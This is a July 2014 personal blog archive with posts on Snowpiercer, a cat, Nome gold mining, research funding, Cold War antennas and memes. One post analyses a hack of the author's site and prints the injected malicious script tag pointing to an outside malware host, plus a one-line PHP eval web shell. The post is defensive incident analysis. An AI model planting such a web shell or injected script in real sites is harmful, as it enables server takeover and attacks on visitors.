Monthly Archives: July 2014

Movie Review: Snowpiercer

Posted on by
10

Last week, zaiah and I decided to spend an evening sitting in a dark room with a bunch of strangers staring passively at a flickering screen. We were in the mood for B science fiction, so we decided to go watch a low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice.

No, I don’t mean Ice Pirates. I mean the one that’s set on a train. I mean this one:

I must admit, it’s a worthy heir to the Ice Pirates crown. Without question, Snowpiercer is the best low-budget sci-fi allegory about classism and economic repression whose characters are faced with losing body parts and whose plot heavily involves ice that’s ever been set on a train.

The movie goes something like this:

Well-intentioned but incompetent scientists: Global warming is a thing. To fight global warming, we will spread a magic chemical in the air that will reduce global temperatures because magic, and also chemtrails. We will not model the results first, nor pay attention to the effects, because in this world modeling and verification are not things.

The WELL-INTENTIONED BUT INCOMPETENT SCIENTISTS spread MAGIC CHEMICALS in the AIR because MAGIC and also CHEMTRAILS. Global temperatures PLUMMET OVERNIGHT because THERMAL INERTIA ALSO ISN’T A THING.

Well-intentioned but incompetent scientists: Wow, we didn’t see that coming! The entire earth is now a frozen snowball and all life is extinct. Oops, our bad.

Jamie Bell: It sure does suck being one of the last human beings alive and being stuck in the back of this train. We should rebel and go to the front of the train. Chris Evans, you should lead us!
Chris Evans: Waitaminnit. If the world suddenly started freezing, why are the only survivors on a train? Why wouldn’t people make domed cities? Or dig shelters underground? For that matter, how come this train is even moving? Where does it get its fuel from?
Jamie Bell: It has a perpetual motion engine, of course! Duh.
Chris Evans: Oh, boy. It’s going to be one of those movies. And I thought my role in Captain America: The Winter Soldier was implausible. Man, I have got to talk to my agent about these winter-themed movies I keep getting cast in.

Click here for more (here be spoilers galore!):

Conversations with a kitty

Posted on by
14

This is our cat Beryl. He’s a blue solid Tonkinese, a cat breed that’s made of one part kitty, three parts fearlessness, and sixteen parts love. Tonks are absolutely amazing kitties, with all of the cute adorableness of your standard-issue cat without any of the surly sociopathy.

A couple days ago, I received a package in the mail. On the same day, I went out to buy new printer ink cartridges and came home with a new black and white laser printer, which was cheaper than a set of replacement ink cartridges because capitalism and market efficiencies and invisible guiding hand and Adam Smith LOL.

Anyway, Beryl and I had a conversation that went something like this:

Me: Hey, kitty! Look! I brought you a present! It’s an empty box!

Beryl: OMG you are the BEST. A box! This is amazing! Thank you! Thank you so much! From here I can hide and pounce on Liam all unawares and stuff.

Me: And check this out! I got a new printer, so here’s another empty box.

Beryl: TWO empty boxes? Truly, my cup runneth over. I don’t think I’ve been this happy since…since…since ever! Now I can hop from one box to another. The cunning box-ambush strategies I can devise with TWO boxes will make me the undisputed champion of my domain. You are the greatest. Truly, I mean that. And it’s not just the boxes, it’s also the food preparation. I will remember you in the long years of my reign.

Me: Okay, I need some more space to set up this printer. Here, let me just put this box inside the other box…

Beryl:

Beryl: The hell?

Beryl: You…you just…

Beryl: There is an empty box inside another empty box!

Beryl: You…I…it…

Beryl: How is this even possible? I can hop into a box, and when I get there, there is..another box! Another box, that I can ALSO hop into!

Beryl: I can be inside TWO BOXES AT THE SAME TIME.

Beryl: How did you make this happen?

Beryl: You are like a god. Like. A. God. A god of boxes. You…I never even…it’s just so beautiful!

Beryl: Never in all my life have I imagined such a thing. You have opened my eyes to the Possible, and truly is it more amazing than I had ever dared to hope.

Beryl: Two boxes. TWO boxes. One box inside…inside the other…I’m having a moment.

Me: I’m glad I could make you happy, little buddy.

Beryl: Happy? Happy? Happy is getting the squishy food. Happy is having ONE box to play with. Happy is sitting on your shoulder while you do that thing where you sit in front of that glowing thing and you pretend like you’re a mage and you press buttons and throw frostbolts around and you swear at the goddamn hunter who always pulls aggro and is never where he’s supposed to be and…

Me: You mean play World of Warcraft?

Beryl: Yes, that. Happy is sitting on your shoulder while you do that. But this…this is…

Beryl: If Voluptas, the goddess of bliss born of the union between Cupid and Psyche, had been capable of feeling what I’m feeling right now, the entire story of the world would be rewritten. Temples in her name would stand still as the greatest of all human accomplishments. If you could package what I’m feeling and distribute it, wars would end, ancient rivalries would be forgotten, petty jealousy would be as extinct as the Stegosaurus.

Me: I’m just glad you like your boxes.

Me: Wait, how the hell do you know about Roman mythology? You’re a cat!

Beryl: Can’t talk. Busy playing. In boxes.

Nome, Alaska: There’s gold on that ther beach!

Posted on by
4

Nome, Alaska was incorporated as a town in 1901, because of a gold rush. In the late 1800s, gold was discovered in the mountains around Nome; in the early 1900s, more gold was discovered in the sand on the edge of the Bering Sea.

There’s still lots of gold in Nome. While there’s no longer a full-on gold rush, there’s still considerable gold mining around Nome, and some of its beaches are designated for “recreational mining.”

For three months out of the year, Nome’s beaches are home to the strangest temporary communities you will find outside Burning Man. But these are not well-off techie hipsters who take drugs and dance around a giant fire. They’re folks from Canada and the United States who head up to Nome, where they set up tents and build makeshift houses from reclaimed materials (shipping pallets, old signs, and whatever else they can find) to spend the summer months sifting the beach sand for gold.

There are all kinds of rules on recreational gold mining. Each “claim” is at most 75 feet wide; claims are temporary and evaporate at the end of the season or when you move off the beach; there’s a limit of 40 ounces of gold per person or group per year, which is about $52,000 worth at current market prices. There are limits on the equipment that can be used.

The people who do this are a really interesting bunch. We talked to several folks on the beach, most of whom come up year after year to look for gold. The people we met were friendly and outgoing, willing to show us their equipment and talk about their favorite techniques. Most were cagey about the amount of gold they find every year, but my impression was they generally tend to get about the 40-ounce limit.

Or at least that’s what they declare at the end of the season.

There’s industrial-scale mining as well, but to me, the hobbyist mining is absolutely fascinating.

Summer in Nome is strange: the sun barely ever sets (it’s a little freaky to go outside at midnight and see the sun still high in the sky), so the beach miners tend to work whenever they are awake and sleep whenever they’re tired–there seems to be little in the way of set schedules. The temperature was pleasant while we were there, though apparently near-constant light rain and occasional storms are normal during parts of the summer. It is still Alaska, which means the environment is still hostile enough to produce the occasional odd survival event without warning; as a result, the community tends to be close-knit, with everyone watching out for everyone else…interesting to see in folks who are prone to say they enjoy doing this every year at least partly to get away from other people.

The sand on the beach looks like this. The red color apparently indicates rich gold-bearing sand.

I’m actually considering going up there next year and spending the summer living on the beach panning for gold. Not because I expect to find any or to strike it rich, mind, but simply for the experience of it. It would make one hell of a “how I spent my summer vacation” story! (There are rumors the state will not be permitting hobbyist mining on the beach next year, though these rumors seem to have been circulating for years–one person we talked to said he heard the same thing several years back when he did it for the first time.)

Back when the 1940s and 1950s, it was common to mine for gold using enormous dredging machines like this one, now in ruins and slowly crumbling into the tundra:

These gigantic hulks are dotted all over the landscape around Nome. They were expensive to build and ship, and woefully inefficient–at best, they might recover 40% of the gold from the sand. In fact, the tailings left behind by these old machines are being mined again with more efficient techniques, and the amount of gold left in them is quite high.

I’m not sure I want to be doing this, but I am very sure I want to have done it. The book that would come out of this experience would be amazing.

Some thoughts on government funding for research

Posted on by
8

Every time you buy a hard drive, some of your money goes to the German government.

That’s because in the late 1990s, a physicist named Peter Grünberg at the Forschungszentrum Jülich (Jülich Research Center) made a rather odd discovery.

The Jülich Research Center is a government-funded German research facility that explores nuclear physics, geoscience, and other fields. There’s a particle accelerator there, and a neutron scattering reactor, and not one or two or even three but a whole bunch of supercomputers, and a magnetic confinement fusion tokamak, and a whole bunch of other really neat and really expensive toys. All of the Center’s research money comes from the government–half from the German federal government and half from the Federal State of North Rhine-Westphalia.

Anyway, like I was saying, in the late 1990s, Peter Grünberg made a rather odd discovery. He was exploring quantum physics, and found that in a material made of several layers of magnetic and non-magnetic materials, if the layers are thin enough (and by “thin enough” I mean “only a few atoms thick”), the material’s resistance changes dramatically when it’s exposed to very, very weak magnetic fields.

There’s a lot of deep quantum voodoo about why this is. Wikipedia has this to say on the subject:

If scattering of charge carriers at the interface between the ferromagnetic and non-magnetic metal is small, and the direction of the electron spins persists long enough, it is convenient to consider a model in which the total resistance of the sample is a combination of the resistances of the magnetic and non-magnetic layers.

In this model, there are two conduction channels for electrons with various spin directions relative to the magnetization of the layers. Therefore, the equivalent circuit of the GMR structure consists of two parallel connections corresponding to each of the channels. In this case, the GMR can be expressed as

Here the subscript of R denote collinear and oppositely oriented magnetization in layers, χ = b/a is the thickness ratio of the magnetic and non-magnetic layers, and ρN is the resistivity of non-magnetic metal. This expression is applicable for both CIP and CPP structures.

Make of that what you will.

Conservatives and Libertarians have a lot of things in common. In fact, for all intents and purposes, libertarians in the United States are basically conservatives who are open about liking sex and drugs. (Conservatives and libertarians both like sex and drugs; conservatives just don’t cop to it.)

One of the many areas they agree on is that the governmet should not be funding science, particularly “pure” science with no obvious technological or commercial application.

Another thing they have in common is they don’t understand what science is. In the field of pure research, you can never tell what will have technological or commercial application.

Back to Peter Grünberg. He discovered that quantum mechanics makes magnets act really weird, and in 2007 he shared a Nobel Prize with French physicist Albert Fert, a researcher at the French Centre national de la recherche scientifique (French National Centre for Scientific Research), France’s largest government-funded research facility.

And it turns out this research had very important commercial applications:

You know how in the 80s and 90s, hard drives were these heavy, clunky things with storage capacities smaller than Rand Paul’s chances at ever winning the Presidency? And then all of a sudden they were terabyte this, two terabyte that?

Some clever folks figured out how to use this weird quantum mechanics voodoo to make hard drive heads that could respond to much smaller magnetic fields, meaning more of them could be stuffed on a magnetic hard drive platter. And boom! You could carry around more storage in your laptop than used to fit in a football stadium.

It should be emphasized that Peter Grünberg and Albert Fert were not trying to invent better hard drives. They were government physicists, not Western Digital employees. They were exploring a very arcane subject–what happens to magnetic fields at a quantum level–with no idea what they would find, or whether it would be applicable to anything.

So let’s talk about your money.

When it became obvious that this weird quantum voodoo did have commercial possibility, the Germans patented it. IBM was the first US company to license the patent; today, nearly all hard drives license giant magnetoresistance patents. Which means every time you buy a hard drive, or a computer with a hard drive in it, some of your money flows back to Germany.

Conservatives and libertarians oppose government funding for science because, to quote the Cato Institute,

[G]overnment funding of university science is largely unproductive. When Edwin Mansfield surveyed 76 major American technology firms, he found that only around 3 percent of sales could not have been achieved “without substantial delay, in the absence of recent academic research.” Thus some 97 percent of commercially useful industrial technological development is, in practice, generated by in-house R&D. Academic science is of relatively small economic importance, and by funding it in public universities, governments are largely subsidizing predatory foreign companies.

Make of that what you will. I’ve read it six times and I’m still not sure I understand the argument.

The Europeans are less myopic. They understand two things the Americans don’t: pure research is the necessary foundation for a nation’s continued economic growth, and private enterprise is terrible at funding pure research.

Oh, there are a handful of big companies that do fund pure research, to be sure–but most private investment in research comes after the pure, no-idea-if-this-will-be-commercially-useful, let’s-see-how-nature-works variety.

It takes a lot of research and development to get from the “Aha! Quantum mechanics does this strange thing when this happens!” to a gadget you have in your home. That also takes money and development, and it’s the sort of research private enterprise excels at. In fact, the Cato Institute cites many examples of biotechnology and semiconductor research that are privately funded, but these are types of research that generally already have a clear practical value, and they take place after the pure research upon which they rest.

So while the Libertarians unite with the Tea Party to call for the government to cut funding for research–which is working, as government research grants have fallen for the last several years in a row–the Europeans are ploughing money into their physics labs and research facilities and the Superconducting Supercollider, which I suspect will eventually produce a stream of practical, patentable ideas…and every time you buy a hard drive, some of your money goes to Germany.

Modern societies thrive on technological innovation. Technological innovation depends on understanding the physical world–even when it seems at first like there aren’t any obvious practical uses for what you learn. They know that, we don’t. I think that’s going to catch up with us.

Nome, Alaska: Ruins of the White Alice facility

Posted on by
12

There’s a mountain overlooking Nome. It’s called Anvil Mountain, and on that mountain is a kind of monument to the Cold War. You can see it from just about anywhere in town. These four enormous antennas squat over the landscape, a silent testament to the money and lives squandered on endless political bickering.

When I saw them, I had to check them out.

These four antennas are part of the old “White Alice” system, a communication system that was part of the old Distant Early Warning radar installation all along Alaska, constantly searching the sky for signs of Russian bombers sneaking over the Arctic and heading across Canada toward the United States.

The system was designed in the 1950s, when fear of the Commies was really starting to gain traction. The Distant Early Warning line was a set of remote high-powered radar facilities all along Alaska, but the designers had a problem. Alaska is huge. If you count the string of islands that extends from its western edge, many of which were home to DEW radar, Alaska is about the same distance stem to stern as the distance from California to New York.

And there are no roads, no telephone lines, and no power lines. Even today, there is no way to get to Nome by road; roads linking it to the rest of Alaska simply do not exist. You get in and out by air or barge, and that’s it.

The radar stations along the DEW line needed to be able to talk to command and control centers. Normal radio wouldn’t work; Alaska is so large that the curve of the earth renders line-of-sight radio unworkable.

So the Air Force came up with an idea: troposphere scattering. Basically, they decided to use enormous antennas pointed at the horizon to blast an immensely powerful radio signal, so strong it would bounce and scatter from the upper layers of the atmosphere, reaching stations beyond the curve of the earth.

The system was code-named “White Alice” and was built at enormous cost in the 1950s and operated through the 1970s, when satellite communication made it obsolete. By the time it was decommissioned, there were 71 of these stations, including the one on Anvil Mountain.

I borrowed a 4×4 and drove up the mountain. The facility is surrounded by a chain-link fence that has long since been pulled down and yanked apart in places. An ancient, battered sign warns trespassers that it’s a restricted area; the locals seem to use it for target practice.

The White Alice installations were powered by enormous diesel generators. Each of the four antennas at a facility consumed up to 10 KW of power; the generators provided power for the transmitters, the living quarters, and small line-of-site microwave dishes that provided short-range communication.

Most of the White Alice facilities have been completely dismantled. Several of them are toxic waste sites, as diesel fuel and other contaminants have been dumped all over the place.

When the Anvil Mountain White Alice facility was decommissioned, the residents of Nome asked the Corps of Engineers to leave the four big antennas. Everything else is gone.

These antennas are huge–about five stories tall.

Cost overruns, under-engineered specifications, and overly optimistic maintenance projections made the White Alice project run ten times over budget. Most of the materials to build the installations–hundreds of tons of equipment for each one–were shipped to remote mountain peaks by dogsled. Airbases were constructed at many of the sites to get fuel, people, and supplies in and out. Technicians worked at these sites year round, facing minus 30 degree weather or worse during the winter.

We went up twice, once during the afternoon and once at 1:30 in the morning to watch the simultaneous sunrise and sunset. I can only imagine how miserable it must have been to work here; in the middle of one of the warmest summers on record, when Nome was facing over-70-degree weather, it was cold and windy on top of the mountain. Winter, when the sun hardly comes up, must have been brutal.

I used my smartphone to take a panorama showing the whole installation from the very peak of Anvil Mountain. Click to embiggen!

Wrong in the age of Google: Memes as social identity

Posted on by
4

A short while ago, I published a tweet on my Twitter timeline that was occasioned by a pair of memes I saw posted on Facebook:

The memes in question have both been circulating for a while, which is terribly disappointing now that we live in the Golden Age of Google. They’re being distributed over an online network of billions of globally-connected devices…an online network of billions of globally-connected devices which lets people discover in just a few seconds that they aren’t actually true.

A quick Google search shows both of these memes, which have been spread across social media countless times, are absolute rubbish.

The quote attributed to Albert Einstein appears to have originated with a self-help writer named Matthew Kelly, who falsely attributed it to Einstein in what was probably an attempt to make it sound more legitimate. It doesn’t even sound like something he would have said.

The second is common on conservative blogs and decries the fact that Obamacare (or, sometimes, Medicaid) offer free health coverage to undocumented immigrants. In fact, Federal law bars undocumented immigrants from receiving Federal health care services or subsidies for health insurance, with just one exception: Medicaid will pay hospitals to deliver babies of undocumented mothers (children born in the United States are legal US citizens regardless of the status of their parents).

Total time to verify both of these memes on Google: less than thirty seconds.

So why, given how fast and easy it is to verify a meme before reposting it, does nobody ever do it? Why do memes that can be demonstrated to be true in less time than it takes to order a hamburger at McDonald’s still get so much currency?

The answer, I think, is that it doesn’t matter whether a meme is true. It doesn’t matter to the people who post memes and it doesn’t matter to the people who read them. Memes aren’t about communication, at least not communication of facts and ideas. They are about social identity.

Viewed through the lens of social identity, memes suddenly make sense. The folks who spread them aren’t trying to educate, inform, or communicate ideas. Memes are like sigils on a Medieval lord’s banner: they indicate identity and allegiance.

These are all memes I’ve seen online in the last six weeks. What inferences can we make about the people who posted them? These memes speak volumes about the political identities of the people who spread them; their truthfulness doesn’t matter. We can talk about the absurdity of Oprah Winfrey’s reluctance to pay taxes or the huge multinational banks that launder money for the drug cartels, and both of those are conversations worth having…but they aren’t what the memes are about.

It’s tempting to see memes as arguments,especially because they often repeat talking points of arguments. But I submit that’s the wrong way to view them. They may contain an argument, but their purpose is not to try to argue; they are not a collective debate on the merits of a position.

Instead, memes are about identifying the affiliations of the folks who post them. They’re a way of signaling in-group and out-group status. That makes them distinct from, say, the political commentary in Banksy’s graffiti, which I think is more a method of making an argument. Memes are a mechanism for validating social identity. Unlike graffiti, there’s no presupposition the memes will be seen by everyone; instead, they’re seen by the poster’s followers on social media–a self-selecting group likely to already identify with the poster.

Even when they’re ridiculously, hilariously wrong. Consider this meme, for example. It shows a photograph of President Barack Obama receiving a medal from the king of Saudi Arabia.

The image is accurate, thought the caption is not. The photo shows Barack Obama receiving the King Abdul Aziz Order of Merit from King Abdullah. It’s not unconstitutional for those in political office to receive gifts from foreign entities, provided those gifts are not kept personally, but are turned over to the General Services Administration or the National Archives.

But the nuances, like I said, don’t matter. It doesn’t even matter that President George W. Bush received the exact same award while he was in office:

If we interpret memes as a way to distribute facts, the anti-Obama meme is deeply hypocritical, since the political conservatives who spread it aren’t bothered that a President on “their” side received the same award. If we see memes as a way to flag political affiliation, like the handkerchiefs some folks in the BDSM community wear in their pockets to signal their interests, it’s not. By posting it, people are signaling their political in-group.

Memes don’t have to be self-consistent. The same groups that post this meme:

also tend by and large to support employment-at-will policies giving employers the right to fire employees for any reason, including reasons that have nothing to do with on-the-job performance…like, for instance, being gay, or posting things on Facebook the employer doesn’t like.

Memes do more than advertise religious affiliation; they signal social affiliation as well.

Any axis along which a sharp social division exists will, I suspect, generate memes. I also suspect, though I think the phenomenon is probably too new to be sure, that times of greater social partisanship will be marked by wider and more frequent distribution of memes, and issues that create sharper divides will likewise lead to more memes.

There are many ideas that are “identity politics”–ideas that are held not because they’re supported by evidence, but simply because they are a cost of entry to certain groups. These ideas form part of the backbone of a group; they serve as a quick litmus test of whether a person is part of the out-group or the in-group.

For example, many religious conservatives reflexively oppose birth control for women, even if the majority of its members, like the majority of women in the US at large, use it. Liberals reflexively oppose nuclear power, even though it is by far the safest source of power on the basis of lives lost per terawatt hour of electricity produced. The arguments used to support these ideas (“birth control pills cause abortions,” “nuclear waste is too dangerous to deal with”) are almost always empirically, demonstrably false, but that’s irrelevant. These ideas are part of a core set of values that define the group; holding them is about communicating shared values, not about true and false.

Unfortunately, these core identity ideas often lead directly not only to misinformation and a distorted worldview, but to actual human suffering. Opposition to vaccination and genetically modified foods are identity ideas among many liberals; conservatives oppose environmental regulation and deny human involvement in climate change as part of their identity ideas. These ideas have already led to human suffering and death, and are likely to lead to more.

Human beings are social animals capable of abstract reasoning, which perhaps makes it inevitable that abstract ideas are so firmly entrenched in our social structures. Ideas help define our social structures, identify in-group and out-group members, and signal social allegiances. The ideas we present, even when they take the form of arguments, are often not attempts at dialog so much as flags that let others know which lord we march for. Social media memes are, in that way, more accurately seen as house sigils than social discourse.

More Than Two hack

Posted on by
2

As most of you know, I do computer security as a hobby. (Browse the Computer Security and Computer Viruses tags on this blog to see what I mean.) So it was with a measure of embarrassment I discovered, while at Atlanta Poly Weekend in June, the More Than Two Web site had been hacked.

I first became aware there was a problem when visiting the site on a phone shows this:

I investigated and discovered that malicious code had been added to the bottom of each page, just below the closing body tag. The following code had been injected:

<noindex>
<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>
</script>
</noindex>

I spent the next few hours not going to panels or workshops, but instead looking at logs, talking to my hosting provider, and investigating the source of the attack. Fortunately, an old friend of mine from Atlanta who does computer security professionally happened to be at the convention, and I spent some time talking to him, too.

A malicious file that offered people a back door into the site had been added, and files had been tampered with to inject the hostile code into HTML pages.

I quickly discovered the attack was targeted only at Android browsers, and only certain versions of Android (as near as I can tell, versions equal to or less than 4.0).

The site at stat.rolledwil.biz returned a 404 Not Found whenever I tried to visit it directly. In addition, non-Android mobile browsers and desktop browsers didn’t return the error.

I remove dthe malicious files and the hack, and then set about figuring out what had happened and what its purpose was. What I found was interesting.

The malicious site at stat.rolledwil.biz was served by Cloudflare, the spam and malware sewer that figures prominently in problems I’ve written about here and here. I emailed Cloudflare, and received a terse reply that the actual host was an outfit called Digital Ocean. I emailed them, and they quickly shut down the malware server.

The number that appears after the question mark in the line

<script src=”http://stat.rolledwil.biz/stat.php?1921853954″>

is an encoded version of the IP address of the More Than Two server. Te first thing this script does is check the browser referrer against this encoded IP address. If they aren’t the same, it returns a 404. Basically, it looks to see if the script is being called from a hacked Web site. If it isn’t, then it’s probably a security researcher trying to figure out what the script does, so it sends back a 404.

The next thing it does is look at the browser’s user agent–the thing that tells a Web site what kind of browser you’re using. If it isn’t Android, it also redirects to a 404. The flow looks like this:

So only if the call appears to be coming from an Android browser visiting a hacked Web site does the malicious script get served up. The script produces the alert dialog shown above, and tries to redirect to a URL in Eastern Europe (not functioning at the time I observed this).

The initial attack vector seems to be a variety of the Mayhem worm targeting Web servers. My Web hosting company was apparently vulnerable (the problem has since been fixed), and the exploit was used to drop a malicious PHP file on my server. The PHP file looked like this:

<?php @eval(stripslashes($_REQUEST[ev]));

If you know PHP, you’re probably filled with a sinking feeling of horror and dread looking at that. Basically, it allows a person to execute commands on a Web server from a browser.

From here, the attackers modified the files on the Web server to inject the malicious HTML into Web pages.

The server has been fixed, the CMS I use has been updated, and I’ve taken other steps to ensure against a repeat attack. The attack vector was closed the day after I discovered it, but I haven’t written about the attack prior to this until I had finished analyzing it and had a good understanding of exactly what happened and how it worked.

The fact this attack was as sophisticated as it was and was aimed, not at Windows, but at Android, is interesting.

There’s a postscript to this. The malicious attack site was served up by Cloudflare, the content distribution network with a reckless disregard for security and abuse. I notified the actual Web host, Digital Ocean, about the attack, and they had disabled the site by June 11.

However, a month after being told the site was serving malware and being used as part of a Web attack, and almost a month after the site had been disabled, Cloudflare was still trying to serve its content:

Cloudflare appears indifferent to even the most egregious abuse, and will continue to provide services to abusive Web sites long after they’re notified of the abuse, and even long after the sites’ hosts have shut them down. I’m not quite sure what to make of that, but I’m becoming more and more convinced Cloudflare is a menace to the Internet.

Nome, Alaska: Simultaneous Sunrise and Sunset

Posted on by
4

The sun rises in the east and sets in the west, as every fule know.

What we don’t often think about is this is really true only at the equator, and even there it’s only entirely true during the solstices. For people anywhere else, or at any other time, the sun actually rises in the northeast and sets in the northwest (if you’re in the southern hemisphere) or rises in the southeast and sets in the southwest (if you’re in the southern hemisphere). Or at least it would, if the earth weren’t tilted on its axis.

Since the earth is tilted, not only does the sun generally not rise and set at locations 180 degrees apart from each other, the location of sunrise and sunset wobbles as the year goes on.

When you’re north of the Arctic Circle, things get really weird.

At the summer solstice, the sun doesn’t set at all, and during the winter solstice, it never rises. The rest of the time, it makes circles in the sky. The circles wobble as the year goes by…during the summer, most of the circle is above the horizon, and as winter comes, the circle sinks below the horizon. (So, if you plot the path of the sun in the sky–when it is in the sky–over the course of time, it actually does a spiral.)

Last night,  I climbed to the top of Anvil Mountain just outside Nome, Alaska (which is near enough to the Arctic Circle to see some of the weirdness) at 2 o’clock in the morning to watch the “sunset.” I say “sunset” because it’s still pretty much full daylight out. The sun dips just barely below the edge of the horizon, but it doesn’t stay there, and it comes up again shortly thereafter…meaning we saw a simultaneous sunset and sunrise.

The red in the sky on the left of this panorama is the sunset. The red in the sky on the right is sunrise. The sun is traveling in a shallow arc that just barely dips beneath the horizon.

Click on the picture to embiggen!

Nome, Alaska: The Last Train to Nowhere

Posted on by
12

As the result of a lengthy and somewhat improbable series of events, I’m in Nome, Alaska, working on another book.

A few days back, we took a drive on the one road that goes through Nome. Nome is inaccessible by car; the only road links it to the nearby towns of Council and Teller.

If you drive out toward Council, a trip I recommend only during the summer and then only in a large 4WD vehicle, about twenty miles from Nome you’ll come across the long-deserted ghost town of Solomon, a leftover from the gold rush in the early 1900s. Near Solomon, you’ll find what’s left of a failed attempt to bring rail service to Nome.

In 1903, an enterprising group of people formed a company to build a railroad to serve the gold mines near Solomon. They bought a bunch of secondhand elevated railway engines from New York City and hauled them up to Nome by barge.

In 1907, a storm washed out the one rail bridge between Solomon and Nome, leaving the trains stranded on the edge of the water. The company folded and simply walked away, leaving the trains where they were, to quietly rust away into the tundra.

That seems to be a common theme in Alaska. The landscape is dotted with abandoned mining equipment, wrecked construction vehicles, and huge pieces of machinery simply left where they were when they became inoperable.

The locals call this steam engine graveyard “The Last Train to Nowhere.”

Even during the summer, it’s cold and windy here. The train never was reliable under the best of circumstances, so it’s no surprise there was no effort to replace it.